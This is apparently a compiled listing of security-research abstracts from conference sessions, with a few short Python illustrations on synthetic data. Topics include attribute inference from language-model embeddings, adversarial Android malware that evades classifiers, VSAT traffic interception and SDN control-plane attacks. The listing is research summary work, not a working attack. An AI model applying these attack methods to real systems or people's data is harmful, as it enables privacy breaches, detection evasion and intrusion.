Recently, a new paradigm of building general-purpose language models (e.g., Google’s Bert and OpenAI’s GPT-2) in Natural Language Processing (NLP) for text feature extraction, a standard procedure in NLP systems that converts texts to vectors (i.e., embeddings) for downstream modeling, has arisen and is finding application in various downstream NLP tasks and real-world systems (e.g., Google’s search engine [6]). To obtain general-purpose text embeddings, these language models have highly complicated architectures with millions of learnable parameters and are usually pretrained on billions of sentences before being utilized. As is widely recognized, such a practice indeed improves the state-of-the-art performance of many downstream NLP tasks. However, the improved utility is not for free. We find that the text embeddings from general-purpose language models capture a great deal of sensitive information from the plain text. Once accessed by an adversary, the embeddings can be reverse-engineered to disclose sensitive information about the victims for further harassment. Although such a privacy risk can pose a real threat to the future use of these promising NLP tools, there are thus far neither published attacks nor systematic evaluations for mainstream industry-level language models. To bridge this gap, we present the first systematic study on the privacy risks of 8 state-of-the-art language models with 4 diverse case studies. By constructing 2 novel attack classes, our study demonstrates that the aforementioned privacy risks do exist and can impose practical threats to the application of general-purpose language models on sensitive data covering identity, genome, healthcare and location. For example, we show that an adversary with nearly no prior knowledge can achieve about 75% accuracy when inferring the precise disease site from Bert embeddings of patients’ medical descriptions. As possible countermeasures, we propose 4 different defenses (via rounding, different…
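
The generic attack pattern is simple: embed auxiliary labeled texts with the same public language model, then train a classifier from embeddings to the sensitive attribute. A hedged sketch with synthetic vectors standing in for real Bert embeddings (the dimension 768 matches Bert-base; all data here is made up for illustration):

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(1)
dim, n = 768, 400                       # 768 = Bert-base embedding size
secret = rng.integers(0, 2, size=n)     # e.g., a binary disease label
signal = rng.normal(size=dim)           # the direction that leaks it
X = rng.normal(size=(n, dim)) + np.outer(secret, signal)  # "leaky" embeddings

# The adversary fits a classifier on auxiliary labeled embeddings,
# then applies it to the victim's embeddings.
attack = LogisticRegression(max_iter=1000).fit(X[:300], secret[:300])
print("attack accuracy:", attack.score(X[300:], secret[300:]))
```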

Intriguing Properties of Adversarial ML Attacks in the Problem Space

Recent research efforts on adversarial ML have investigated problem-space attacks, focusing on the generation of real evasive objects in domains where, unlike images, there is no clear inverse mapping to the feature space (e.g., software). However, the design, comparison, and real-world implications of problem-space attacks remain underexplored. This paper makes two major contributions. First, we propose a novel formalization for adversarial ML evasion attacks in the problem-space, which includes the definition of a comprehensive set of constraints on available transformations, preserved semantics, robustness to preprocessing, and plausibility. We shed light on the relationship between feature space and problem space, and we introduce the concept of side-effect features as the byproduct of the inverse feature-mapping problem. This enables us to define and prove necessary and sufficient conditions for the existence of problem-space attacks. We further demonstrate the expressive power of our formalization by using it to describe several attacks from related literature across different domains. Second, building on our formalization, we propose a novel problem-space attack on Android malware that overcomes past limitations. Experiments on a dataset with 170K Android apps from 2017 and 2018 show the practical feasibility of evading a state-of-the-art malware classifier along with its hardened version. Our results demonstrate that “adversarial-malware as a service” is a realistic threat, as we automatically generate thousands of realistic and inconspicuous adversarial applications at scale, where on average it takes only a few minutes to generate an adversarial app. Yet, out of the 1600+ papers on adversarial ML published in the past six years, roughly 40 focus on malware [15]—and many remain only in the feature space. Our formalization of problem-space attacks paves the way to more principled research in this domain. We responsibly release the code and dataset of our novel attack to other researchers, to encourage future work on defenses in the problem space.

Session #7: New Directions and Settings

Influencing Photo Sharing Decisions on Social Media: A Case of Paradoxical Findings

We investigate the effects of perspective taking, privacy cues, and portrayal of photo subjects (i.e., photo valence) on decisions to share photos of people via social media. In an online experiment we queried 379 participants about 98 photos (that were previously rated for photo valence) in three conditions: (1) Baseline: participants judged their likelihood of sharing each photo; (2) Perspective-taking: participants judged their likelihood of sharing each photo when cued to imagine they are the person in the photo; and (3) Privacy: participants judged their likelihood to share after being cued to consider the privacy of the person in the photo. While participants across conditions indicated a lower likelihood of sharing photos that portrayed people negatively, they – surprisingly – reported a higher likelihood of sharing photos when primed to consider the privacy of the person in the photo. Frequent photo sharers on real-world social media platforms and people without strong personal privacy preferences were especially likely to want to share photos in the experiment, regardless of how the photo portrayed the subject. A follow-up study with 100 participants explaining their responses revealed that the Privacy condition led to a lack of concern with others’ privacy. These findings suggest that developing interventions for reducing photo sharing and protecting the privacy of others is a multivariate problem in which seemingly obvious solutions can sometimes go awry.

SoK: Cyber Insurance - Technical Challenges and a System Security Roadmap

Cyber attacks have increased in number and complexity in recent years, and companies and organizations have accordingly raised their investments in more robust infrastructure to preserve their data, assets and reputation. However, full protection against these countless and constantly evolving threats is unattainable by the sole use of preventive measures. Therefore, to handle residual risks and contain business losses in case of an incident, firms are increasingly adopting cyber insurance as part of their corporate risk management strategy. As a result, the cyber insurance sector – which offers to transfer the financial risks related to network and computer incidents to a third party – is rapidly growing, with recent claims already reaching $100M. However, while other insurance sectors rely on consolidated methodologies to accurately predict risks, the many peculiarities of the cyber domain have led carriers to often resort to qualitative approaches based on expert opinions. This paper looks at past research conducted in the area of cyber insurance and classifies previous studies in four different areas, focused respectively on studying the economic aspects, the mathematical models, the risk management methodologies, and the prediction of cyber events. We then identify, for each insurance phase, a group of practical research problems where security experts can help develop new data-driven methodologies and automated tools to replace the existing qualitative approaches.

A Tale of Sea and Sky: On the Security of Maritime VSAT Communications

Very Small Aperture Terminals (VSAT) have revolutionized maritime operations. However, the security dimensions of maritime VSAT services are not well understood. Historically, high equipment costs have acted as a barrier to entry for both researchers and attackers. In this paper we demonstrate a substantial change in threat model, proving practical attacks against maritime VSAT networks with less than $400 of widely-available television equipment. This is achieved through GSExtract, a purpose-built forensic tool which enables the extraction of IP traffic from highly corrupted VSAT data streams. The implications of this threat are assessed experimentally through the analysis of more than 1.3 TB of real-world maritime VSAT recordings encompassing 26 million square kilometers of coverage area. The underlying network platform employed in these systems is representative of more than 60% of the global maritime VSAT services market. We find that sensitive data belonging to some of the world’s largest maritime companies is regularly leaked over VSAT ship-to-shore communications. This threat is contextualized through illustrative case studies ranging from the interception and alteration of navigational charts to theft of passport and credit card details. Beyond this, we demonstrate the ability to arbitrarily intercept and modify TCP sessions under certain network configurations, enabling man-in-the-middle and denial of service attacks against ships at sea. The paper concludes with a brief discussion of the unique requirements and challenges for encryption in VSAT environments.

I Know Where You Parked Last Summer: Automated Reverse Engineering and Privacy Analysis of Modern Cars

Nowadays, cars are equipped with hundreds of sensors and dozens of computers that process data. Unfortunately, due to the very secretive nature of the automotive industry, there is no official or objective source of information as to what data exactly their vehicles collect. Anecdotal evidence suggests that OEMs are collecting huge amounts of personal data about their drivers, which they suddenly reveal when requested in court. In this paper, we present our tool AutoCAN for privacy and security analysis of cars. It reveals what data cars collect by tapping into in-vehicle networks, extracting time series of data, and automatically making sense of them by establishing relationships based on the laws of physics. These algorithms work irrespective of make, model or protocols used. Our results show that car makers track the GPS position, the number of occupants, their weight, and usage statistics of doors, lights, and AC. We also reveal that OEMs embed functions to remotely disable the car or get an alert when the driver is speeding.

Session #8: Program Analysis

RetroWrite: Statically Instrumenting COTS Binaries for Fuzzing and Sanitization

Analyzing the security of closed source binaries is currently impractical for end-users, or even developers who rely on third-party libraries. Such analysis relies on automatic vulnerability discovery techniques, most notably fuzzing with sanitizers enabled. The current state of the art for applying fuzzing or sanitization to binaries is dynamic binary translation, which has prohibitive performance overhead. The alternate technique, static binary rewriting, cannot fully recover symbolization information and hence has difficulty modifying binaries to track code coverage for fuzzing or to add security checks for sanitizers. The ideal solution for binary security analysis would be a static rewriter that can intelligently add the required instrumentation as if it were inserted at compile time. Such instrumentation requires an analysis to statically disambiguate between references and scalars, a problem known to be undecidable in the general case. We show that recovering this information is possible in practice for the most common class of software and libraries: 64-bit, position independent code. Based on this observation, we develop RetroWrite, a binary-rewriting instrumentation to support American Fuzzy Lop (AFL) and Address Sanitizer (ASan), and show that it can achieve compiler-level performance while retaining precision. Binaries rewritten for coverage-guided fuzzing using RetroWrite are identical in performance to compiler-instrumented binaries and outperform the default QEMU-based instrumentation by 4.5x while triggering more bugs. Our implementation of binary-only Address Sanitizer is 3x faster than Valgrind’s memcheck, the state-of-the-art binary-only memory checker, and detects 80% more bugs in our evaluation.

Unexpected Data Dependency Creation and Chaining: A New Attack to SDN

Software-Defined Networking (SDN) is an emerging network architecture that provides programmable networking through a logically centralized controller. As SDN becomes more prominent, its security vulnerabilities become more evident than ever. Serving as the “brain” of a software-defined network, how the control plane (of the network) is exposed to external inputs (i.e., data plane messages) is directly correlated with how secure the network is. Fortunately, due to some unique SDN design choices (e.g., control plane and data plane separation), attackers often struggle to find a reachable path to the vulnerable logic hidden deep within the control plane. In this paper, we demonstrate that it is possible for a weak adversary who only controls a commodity network device (host or switch) to attack previously unreachable control plane components by maliciously increasing reachability in the control plane. We introduce the D²C² (data dependency creation and chaining) attack, which leverages some widely-used SDN protocol features (e.g., custom fields) to create and chain unexpected data dependencies in order to achieve greater reachability. We have developed a novel tool, SVHunter, which can effectively identify D²C² vulnerabilities. To date, we have evaluated SVHunter on three mainstream open-source SDN controllers (i.e., ONOS, Floodlight, and Opendaylight) as well as one security-enhanced controller (i.e., SE-Floodlight). SVHunter detects 18 previously unknown vulnerabilities, all of which can be exploited remotely to launch serious attacks such as executing arbitrary commands, exfiltrating confidential files, and crashing SDN services.

Neutaint: Efficient Dynamic Taint Analysis with Neural Networks

Dynamic taint analysis (DTA) is widely used by various applications to track information flow during runtime execution. Existing DTA techniques use rule-based taint-propagation, which is neither accurate (i.e., high false positive rate) nor efficient (i.e., large runtime overhead). It is hard to specify taint rules for each operation while covering all corner cases correctly. Moreover, the overtaint and undertaint errors can accumulate during the propagation of taint information across multiple operations. Finally, rule-based propagation requires each operation to be inspected before applying the appropriate rules, resulting in prohibitive performance overhead on large real-world applications. In this work, we propose Neutaint, a novel end-to-end approach to track information flow using neural program embeddings. The neural program embeddings model the target program’s computations between taint sources and sinks, automatically learning the information flow by observing a diverse set of execution traces. To perform lightweight and precise information flow analysis, we utilize saliency maps to reason about the most influential sources for different sinks. Neutaint constructs two saliency maps (a popular machine learning approach to influence analysis) to summarize both coarse-grained and fine-grained information flow in the neural program embeddings. We compare Neutaint with 3 state-of-the-art dynamic taint analysis tools. The evaluation results show that Neutaint achieves 68% accuracy on average, a 10% improvement over the second-best taint tool, Libdft, while reducing runtime overhead by 40× on 6 real-world programs. Neutaint also achieves 61% more edge coverage when used for taint-guided fuzzing, indicating the effectiveness of the identified influential bytes. We also evaluate Neutaint’s ability to detect real-world software attacks. The results show that Neutaint can successfully detect different types of vulnerabilities including buffer/heap/integer overflows, division by zero, etc. Lastly, Neutaint can detect 98.7% of total flows, the highest among all taint analysis tools.
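
The saliency-map idea can be approximated without any neural network: perturb each source byte and observe how much the sink value changes. Neutaint computes the analogous quantity as a gradient over its learned neural program embedding; the finite-difference stand-in below is only meant to convey the intuition:

```python
import numpy as np

def program(inp):
    """Toy stand-in for a path from taint source to sink: only
    bytes 3 and 7 actually influence the sink value."""
    return (inp[3] * 2 + inp[7]) % 256

def byte_saliency(inp):
    """Finite-difference influence of each input byte on the sink,
    ranked from most to least influential."""
    base = program(inp)
    scores = []
    for i in range(len(inp)):
        flipped = inp.copy()
        flipped[i] = (flipped[i] + 1) % 256
        scores.append(abs(program(flipped) - base))
    return np.argsort(scores)[::-1]

inp = np.arange(16) % 256
print("most influential bytes:", byte_saliency(inp)[:2])  # bytes 3 and 7
```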

KARONTE: Detecting Insecure Multi-binary Interactions in Embedded Firmware

Low-power, single-purpose embedded devices (e.g., routers and IoT devices) have become ubiquitous. While they automate and simplify many aspects of users’ lives, recent large-scale attacks have shown that their sheer number poses a severe threat to the Internet infrastructure. Unfortunately, the software on these systems is hardware-dependent, and typically executes in unique, minimal environments with non-standard configurations, making security analysis particularly challenging. Many of the existing devices implement their functionality through the use of multiple binaries. This multi-binary service implementation renders current static and dynamic analysis techniques either ineffective or inefficient, as they are unable to identify and adequately model the communication between the various executables. In this paper, we present Karonte, a static analysis approach capable of analyzing embedded-device firmware by modeling and tracking multi-binary interactions. Our approach propagates taint information between binaries to detect insecure interactions and identify vulnerabilities. We first evaluated Karonte on 53 firmware samples from various vendors, showing that our prototype tool can successfully track and constrain multi-binary interactions. This led to the discovery of 46 zero-day bugs. Then, we performed a large-scale experiment on 899 different samples, showing that Karonte scales well with firmware samples of different size and complexity.

SPIDER: Enabling Fast Patch Propagation In Related Software Repositories

Despite the effort of software maintainers, patches to open-source repositories are propagated from the main codebase to all the related projects (e.g., forks) with a significant delay. Previous work shows that this is true also for security patches, which represents a critical problem. Vulnerability databases, such as the CVE database, were born to speed up the application of critical patches; however, patches associated with CVE entries (i.e., CVE patches) are still applied with a delay, and some security fixes lack the corresponding CVE entries. Because of this, project maintainers could miss security patches when upgrading software. In this paper, we are the first to define safe patches (sps). An sp is a patch that does not disrupt the intended functionality of the program (on valid inputs), meaning that it can be applied with no testing; we argue that most security fixes fall into this category. Furthermore, we show a technique to identify sps, and implement SPIDER, a tool based on such a technique that works by analyzing the source code of the original and patched versions of a file. We performed a large-scale evaluation on 341,767 patches from 32 large and popular source code repositories as well as on 809 CVE patches. Results show that SPIDER was able to identify 67,408 sps and that most of the CVE patches are sps. In addition, SPIDER identified 2,278 patches that fix vulnerabilities lacking a CVE; 229 of these are still unpatched in different vendor kernels, which can be considered potential unfixed vulnerabilities.

Session #8: Fuzzing

SAVIOR: Towards Bug-Driven Hybrid Testing

Hybrid testing combines fuzz testing and concolic execution. It leverages fuzz testing to test easy-to-reach code regions and uses concolic execution to explore code blocks guarded by complex branch conditions. As a result, hybrid testing is able to reach deeper into program state space than fuzz testing or concolic execution alone. Recently, hybrid testing has seen significant advancement. However, its code coverage-centric design is inefficient in vulnerability detection. First, it blindly selects seeds for concolic execution and aims to explore new code continuously. However, as statistics show, a large portion of the explored code is often bug-free. Therefore, giving equal attention to every part of the code during hybrid testing is a non-optimal strategy. It slows down the detection of real vulnerabilities by over 43%. Second, classic hybrid testing quickly moves on after reaching a chunk of code, rather than examining the hidden defects inside. It may frequently miss subtle vulnerabilities even though it has already explored the vulnerable code paths. We propose SAVIOR, a new hybrid testing framework pioneering a bug-driven principle. Unlike the existing hybrid testing tools, SAVIOR prioritizes the concolic execution of the seeds that are likely to uncover more vulnerabilities. Moreover, SAVIOR verifies all vulnerable program locations along the executing program path. By modeling faulty situations using SMT constraints, SAVIOR reasons about the feasibility of vulnerabilities and generates concrete test cases as proofs. Our evaluation shows that the bug-driven approach outperforms mainstream automated testing techniques, including state-of-the-art hybrid testing systems driven by code coverage. On average, SAVIOR detects vulnerabilities 43.4% faster than DRILLER and 44.3% faster than QSYM, leading to the discovery of 88 and 76 more unique bugs, respectively. According to the evaluation on 11 well-fuzzed benchmark programs, within the first 24 hours, SAVIOR triggers 481 UBSAN violations, among which 243 are real bugs.
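
The scheduling idea reduces to a priority queue keyed by how many unverified, potentially faulty locations a seed's path reaches. A hedged sketch (block labels and scores are invented for illustration; SAVIOR derives them from UBSan instrumentation):

```python
import heapq

# Bug-driven seed scheduling: prefer seeds whose execution paths
# reach more unverified, potentially faulty blocks.
potential_bugs = {"blk7", "blk9", "blk12"}       # e.g., UBSan-flagged blocks
seeds = {
    "seed_a": {"blk1", "blk7", "blk9"},          # blocks covered by the seed
    "seed_b": {"blk2", "blk3"},
    "seed_c": {"blk7", "blk12"},
}

heap = [(-len(path & potential_bugs), name) for name, path in seeds.items()]
heapq.heapify(heap)
while heap:
    score, name = heapq.heappop(heap)
    print(f"concolic-execute {name} (reaches {-score} potential bugs)")
```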

IJON: Exploring Deep State Spaces via Fuzzing

Although current fuzz testing (fuzzing) methods are highly effective, there are still many situations such as complex state machines where fully automated approaches fail. State-of-the-art fuzzing methods offer very limited ability for a human to interact and aid the fuzzer in such cases. More specifically, most current approaches are limited to adding a dictionary or new seed inputs to guide the fuzzer. When dealing with complex programs, these mechanisms are unable to uncover new parts of the code base. In this paper, we propose Ijon, an annotation mechanism that a human analyst can use to guide the fuzzer. In contrast to the two aforementioned techniques, this approach allows a more systematic exploration of the program’s behavior based on the data representing the internal state of the program. As a consequence, using only a small (usually one line) annotation, a user can help the fuzzer to solve previously unsolvable challenges. We extended various AFL-based fuzzers with the ability to annotate the source code of the target application with guidance hints. Our evaluation demonstrates that such simple annotations are able to solve problems that—to the best of our knowledge—no other current fuzzer or symbolic execution based tool can overcome. For example, with our extension, a fuzzer is able to play and solve games such as Super Mario Bros. or resolve more complex patterns such as hash map lookups. To further demonstrate the capabilities of our annotations, we use AFL combined with Ijon to uncover both novel security issues and issues that previously required a custom and comprehensive grammar to be uncovered. Lastly, we show that using Ijon and AFL, one can solve many challenges from the CGC data set that resisted all fully automated and human guided attempts so far.
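
The real tool annotates C source and feeds the exposed state into AFL's feedback map. The Python mock below captures the mechanism by analogy: a toy maze "program" exposes each visited cell as feedback (as an IJON_SET(x, y) annotation would), and a trivial mutation loop keeps any input that reaches a new state:

```python
import random

MAZE_GOAL = (4, 4)

def run(inp):
    """Toy target: inp is a string of moves on a 5x5 grid. The
    'annotation' exposes every visited (x, y) cell as feedback."""
    x = y = 0
    visited = set()
    for c in inp:
        x += (c == "R") - (c == "L")
        y += (c == "D") - (c == "U")
        x, y = max(0, min(4, x)), max(0, min(4, y))
        visited.add((x, y))
    return visited

random.seed(0)
seen, corpus = set(), [""]
for _ in range(20000):
    parent = random.choice(corpus)
    child = parent + random.choice("UDLR")   # minimal mutation
    fb = run(child)
    if fb - seen:                            # new annotated state reached
        seen |= fb
        corpus.append(child)
    if MAZE_GOAL in fb:
        print("solved:", child)
        break
```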

Pangolin: Incremental Hybrid Fuzzing with Polyhedral Path Abstraction

Hybrid fuzzing, which combines the merits of both fuzzing and concolic execution, has become one of the most important trends in coverage-guided fuzzing techniques. Despite the tremendous research on hybrid fuzzers, we observe that existing techniques are still inefficient. One important reason is that these techniques, which we refer to as non-incremental fuzzers, cache and reuse few computation results and, thus, lose many optimization opportunities. To be incremental, we propose “polyhedral path abstraction”, which preserves the exploration state in the concolic execution stage and allows more effective mutation and constraint solving over existing techniques. We have implemented our idea as a tool, namely Pangolin, and evaluated it using LAVA-M as well as nine real-world programs. The evaluation results showed that Pangolin outperforms the state-of-the-art fuzzing techniques, improving the coverage rate by 10% to 30%. Moreover, Pangolin found 400 more bugs in LAVA-M and discovered 41 unseen bugs, 8 of which were assigned CVE IDs.

Fuzzing JavaScript Engines with Aspect-preserving Mutation

Fuzzing is a practical, widely-deployed technique to find bugs in complex, real-world programs like JavaScript engines. We observed, however, that existing fuzzing approaches, either generative or mutational, fall short in fully harvesting high-quality input corpora such as known proof of concept (PoC) exploits or unit tests. Existing fuzzers tend to destruct subtle semantics or conditions encoded in the input corpus in order to generate new test cases because this approach helps in discovering new code paths of the program. Nevertheless, for JavaScript-like complex programs, such a conventional design leads to test cases that tackle only shallow parts of the complex codebase and fails to reach deep bugs effectively due to the huge input space. In this paper, we advocate a new technique, called an aspect-preserving mutation, that stochastically preserves the desirable properties, called aspects, that we prefer to be maintained across mutation. We demonstrate the aspect preservation with two mutation strategies, namely, structure and type preservation, in our fully-fledged JavaScript fuzzer, called Die. Our evaluation shows that Die’s aspect-preserving mutation is more effective in discovering new bugs (5.7× more unique crashes) and producing valid test cases (2.4× fewer runtime errors) than the state-of-the-art JavaScript fuzzers. Die newly discovered 48 high-impact bugs in ChakraCore, JavaScriptCore, and V8 (38 fixed with 12 CVEs assigned as of today). The source code of Die is publicly available as an open-source project.

Krace: Data Race Fuzzing for Kernel File Systems

Data races occur when two threads fail to use proper synchronization when accessing shared data. In kernel file systems, which are highly concurrent by design, data races are common mistakes and often wreak havoc on the users, causing inconsistent states or data losses. Prior fuzzing practices on file systems have been effective in uncovering hundreds of bugs, but they mostly focus on the sequential aspect of file system execution and do not comprehensively explore the concurrency dimension and hence, forgo the opportunity to catch data races. In this paper, we bring coverage-guided fuzzing to the concurrency dimension with three new constructs: 1) a new coverage tracking metric, alias coverage, specially designed to capture the exploration progress in the concurrency dimension; 2) an evolution algorithm for generating, mutating, and merging multi-threaded syscall sequences as inputs for concurrency fuzzing; and 3) a comprehensive lockset and happens-before modeling for kernel synchronization primitives for precise data race detection. These components are integrated into Krace, an end-to-end fuzzing framework that has discovered 23 data races in ext4, btrfs, and the VFS layer so far, and 9 are confirmed to be harmful.
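
Alias coverage can be modeled compactly: progress means observing a new unordered pair of instruction addresses that touch the same memory location from different threads. A minimal Python sketch of such a tracker (Krace implements this in the kernel with compiler instrumentation):

```python
class AliasCoverage:
    """Minimal model of alias coverage: a run makes progress when a
    new pair of instructions (pc_a, pc_b), executed by different
    threads, accesses the same memory address."""
    def __init__(self):
        self.last_access = {}   # addr -> (pc, thread_id) of last access
        self.pairs = set()      # unordered (pc, pc) alias pairs seen

    def on_access(self, addr, pc, tid):
        prev = self.last_access.get(addr)
        if prev and prev[1] != tid:                       # cross-thread pair
            self.pairs.add(tuple(sorted((prev[0], pc))))
        self.last_access[addr] = (pc, tid)

cov = AliasCoverage()
for addr, pc, tid in [(0x10, "A", 1), (0x10, "B", 2), (0x10, "C", 1)]:
    cov.on_access(addr, pc, tid)
print(cov.pairs)   # {('A', 'B'), ('B', 'C')}
```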

USENIX Security

2018 Technical Sessions dblp

Censorship and Web Privacy

Fp-Scanner: The Privacy Implications of Browser Fingerprint Inconsistencies

By exploiting the diversity of device and browser configurations, browser fingerprinting established itself as a viable technique to enable stateless user tracking in production. Companies and academic communities have responded with a wide range of countermeasures. However, the way these countermeasures are evaluated does not properly assess their impact on user privacy, in particular regarding the quantity of information they may indirectly leak by revealing their presence.

In this paper, we investigate the current state of the art of browser fingerprinting countermeasures to study the inconsistencies they may introduce in altered fingerprints, and how this may impact user privacy. To do so, we introduce FP-Scanner as a new test suite that explores browser fingerprint inconsistencies to detect potential alterations, and we show that we are capable of detecting countermeasures from the inconsistencies they introduce. Beyond spotting altered browser fingerprints, we demonstrate that FP-Scanner can also reveal the original value of altered fingerprint attributes, such as the browser or the operating system. We believe that this result can be exploited by fingerprinters to more accurately target browsers with countermeasures.
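
A single concrete example of such an inconsistency test: a spoofed User-Agent frequently disagrees with attributes the countermeasure forgot to alter, such as navigator.platform. The rules below are illustrative; the real suite checks many more attributes (canvas, fonts, WebGL, and so on):

```python
# Toy consistency rule: does the OS claimed by the User-Agent match
# the navigator.platform value the browser also reports?
UA_OS_TO_PLATFORMS = {
    "Windows": {"Win32", "Win64"},
    "Mac OS X": {"MacIntel"},
    "Linux": {"Linux x86_64", "Linux i686"},
}

def inconsistent(user_agent, platform):
    for ua_os, plats in UA_OS_TO_PLATFORMS.items():
        if ua_os in user_agent:
            return platform not in plats
    return False   # unknown OS string: no verdict

print(inconsistent(
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...", "MacIntel"))  # True
```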

Who Left Open the Cookie Jar? A Comprehensive Evaluation of Third-Party Cookie Policies

Nowadays, cookies are the most prominent mechanism to identify and authenticate users on the Internet. Although protected by the Same Origin Policy, popular browsers include cookies in all requests, even when these are cross-site. Unfortunately, these third-party cookies enable both cross-site attacks and third-party tracking. As a response to these nefarious consequences, various countermeasures have been developed in the form of browser extensions or even protection mechanisms that are built directly into the browser.

In this paper, we evaluate the effectiveness of these defense mechanisms by leveraging a framework that automatically evaluates the enforcement of the policies imposed on third-party requests. By applying our framework, which generates a comprehensive set of test cases covering various web mechanisms, we identify several flaws in the policy implementations of the 7 browsers and 46 browser extensions that were evaluated. We find that even built-in protection mechanisms can be circumvented by multiple novel techniques we discover. Based on these results, we argue that our proposed framework is a much-needed tool to detect bypasses and evaluate solutions to the exposed leaks. Finally, we analyze the origin of the identified bypass techniques, and find that these are due to a variety of implementation, configuration and design flaws.

Effective Detection of Multimedia Protocol Tunneling using Machine Learning

Multimedia protocol tunneling enables the creation of covert channels by modulating data into the input of popular multimedia applications such as Skype. To be effective, protocol tunneling must be unobservable, i.e., an adversary should not be able to distinguish the streams that carry a covert channel from those that do not. However, existing multimedia protocol tunneling systems have been evaluated using ad hoc methods, which casts doubts on whether such systems are indeed secure, for instance, for censorship-resistant communication.

In this paper, we conduct an experimental study of the unobservability properties of three state-of-the-art systems: Facet, CovertCast, and DeltaShaper. Our work unveils that previous claims regarding the unobservability of the covert channels produced by those tools were flawed and that existing machine learning techniques, namely those based on decision trees, can uncover the vast majority of those channels while incurring comparatively lower false positive rates. We also explore the application of semi-supervised and unsupervised machine learning techniques. Our findings suggest that the existence of manually labeled samples is a requirement for the successful detection of covert channels.
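
The detection pipeline is conventional supervised learning: summarize each encrypted stream into features such as quantized packet-length histograms, then train a tree-based classifier. A hedged sklearn sketch on synthetic data (real features would come from labeled Facet/CovertCast/DeltaShaper captures):

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier  # a tree-based classifier

rng = np.random.default_rng(7)

def histograms(center, n):
    """n flows of 500 packet lengths each, summarized as 30-bin
    histograms over [0, 1500] bytes."""
    lens = rng.normal(center, 60, size=(n, 500)).clip(0, 1500)
    return np.stack([np.histogram(r, bins=30, range=(0, 1500))[0]
                     for r in lens])

X = np.vstack([histograms(900, 200),    # legitimate video calls (synthetic)
               histograms(700, 200)])   # calls carrying a covert channel
y = np.array([0] * 200 + [1] * 200)

idx = rng.permutation(400)
clf = RandomForestClassifier(n_estimators=100).fit(X[idx[:300]], y[idx[:300]])
print("accuracy:", clf.score(X[idx[300:]], y[idx[300:]]))
```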

Quack: Scalable Remote Measurement of Application-Layer Censorship

Remote censorship measurement tools can now detect DNS- and IP-based blocking at global scale. However, a major unmonitored form of interference is blocking triggered by deep packet inspection of application-layer data. We close this gap by introducing Quack, a scalable, remote measurement system that can efficiently detect application-layer interference.

We show that Quack can effectively detect application-layer blocking triggered on HTTP and TLS headers, and it is flexible enough to support many other diverse protocols. In experiments, we test for blocking across 4458 autonomous systems, an order of magnitude larger than provided by country probes used by OONI. We also test a corpus of 100,000 keywords from vantage points in 40 countries to produce detailed national blocklists. Finally, we analyze the keywords we find blocked to provide insight into the application-layer blocking ecosystem and compare countries’ behavior. We find that the most consistently blocked services are related to circumvention tools, pornography, and gambling, but that there is significant country-to-country variation.

Understanding How Humans Authenticate

Better managed than memorized? Studying the Impact of Managers on Password Strength and Reuse

Despite their well-known security problems, passwords are still the incumbent authentication method for virtually all online services. To remedy the situation, users are very often referred to password managers as a solution to the password reuse and weakness problems. However, to date the actual impact of password managers on password strength and reuse has not been studied systematically.

We provide the first large-scale study of the password managers’ influence on users’ real-life passwords. By combining qualitative data on users’ password creation and management strategies, collected from 476 participants of an online survey, with quantitative data (incl. password metrics and entry methods) collected in situ with a browser plugin from 170 users, we were able to gain a more complete picture of the factors that influence our participants’ password strength and reuse. Our approach allows us to quantify for the first time that password managers indeed influence password security; however, whether this influence is beneficial or aggravates existing problems depends on the users’ strategies and how well the manager supports the users’ password management right from the time of password creation. Given our results, we think research should further investigate how managers can better support users’ password strategies in order to improve password security as well as to stop aggravating existing problems.

Forgetting of Passwords: Ecological Theory and Data

It is well known that text-based passwords are hard to remember and that users prefer simple (and non-secure) passwords. However, despite extensive research on the topic, no principled account exists for explaining when a password will be forgotten. This paper contributes new data and a set of analyses building on the ecological theory of memory and forgetting. We propose that human memory naturally adapts according to an estimate of how often a password will be needed, such that often used, important passwords are less likely to be forgotten. We derive models for login duration and odds of recall as a function of rate of use and number of uses thus far. The models achieved a root-mean-square error (RMSE) of 1.8 seconds for login duration and 0.09 for recall odds for data collected in a month-long field experiment where frequency of password use was controlled. The theory and data shed new light on password management, account usage, password security and memorability.

The Rewards and Costs of Stronger Passwords in a University: Linking Password Lifetime to Strength

We present an opportunistic study of the impact of a new password policy in a university with 100,000 staff and students. The goal of the IT staff who conceived the policy was to encourage stronger passwords by varying password lifetime according to password strength. Strength was measured through Shannon entropy (acknowledged to be a poor measure of password strength by the academic community, but still widely used in practice). When users change their password, a password meter informs them of the lifetime of their new password, which may vary from 100 days (50 bits of entropy) to 350 days (120 bits of entropy).

We analysed data of nearly 200,000 password changes and 115,000 resets of passwords that were forgotten/expired over a period of 14 months. The new policy took over 100 days to gain traction, but after that, average entropy rose steadily. After another 12 months, the average password lifetime increased from 146 days (63 bits) to 170 days (70 bits).

We also found that passwords with more than 300 days of lifetime are 4 times as likely to be reset as passwords of 100 days of lifetime. Users who reset their password more than once per year (27% of users) choose passwords whose lifetime is over 10 days shorter and, while they also respond to the policy, maintain this deficit.

We conclude that linking password lifetime to strength at the point of password creation is a viable strategy for encouraging users to choose stronger passwords (at least when measured by Shannon entropy).
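
Assuming the policy interpolates linearly between the two stated endpoints (50 bits at 100 days, 120 bits at 350 days; the exact curve is an assumption, not spelled out above), the mapping is easy to reproduce:

```python
def password_lifetime_days(entropy_bits):
    """Lifetime under the described policy, assuming (our assumption)
    linear interpolation between the stated endpoints:
    50 bits -> 100 days, 120 bits -> 350 days."""
    e = max(50, min(120, entropy_bits))
    return 100 + (e - 50) * (350 - 100) / (120 - 50)

for bits in (50, 63, 70, 120):
    print(bits, "bits ->", round(password_lifetime_days(bits)), "days")
```

Reassuringly, this assumed interpolation reproduces the averages quoted above: 63 bits maps to about 146 days and 70 bits to about 171 days.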

Rethinking Access Control and Authentication for the Home Internet of Things (IoT)

Computing is transitioning from single-user devices to the Internet of Things (IoT), in which multiple users with complex social relationships interact with a single device. Currently deployed techniques fail to provide usable access-control specification or authentication in such settings. In this paper, we begin reenvisioning access control and authentication for the home IoT. We propose that access control focus on IoT capabilities (i.e., certain actions that devices can perform), rather than on a per-device granularity. In a 425-participant online user study, we find stark differences in participants’ desired access-control policies for different capabilities within a single device, as well as based on who is trying to use that capability. From these desired policies, we identify likely candidates for default policies. We also pinpoint necessary primitives for specifying more complex, yet desired, access-control policies. These primitives range from the time of day to the current location of users. Finally, we discuss the degree to which different authentication methods potentially support desired policies.

Vulnerability Discovery

ATtention Spanned: Comprehensive Vulnerability Analysis of AT Commands Within the Android Ecosystem

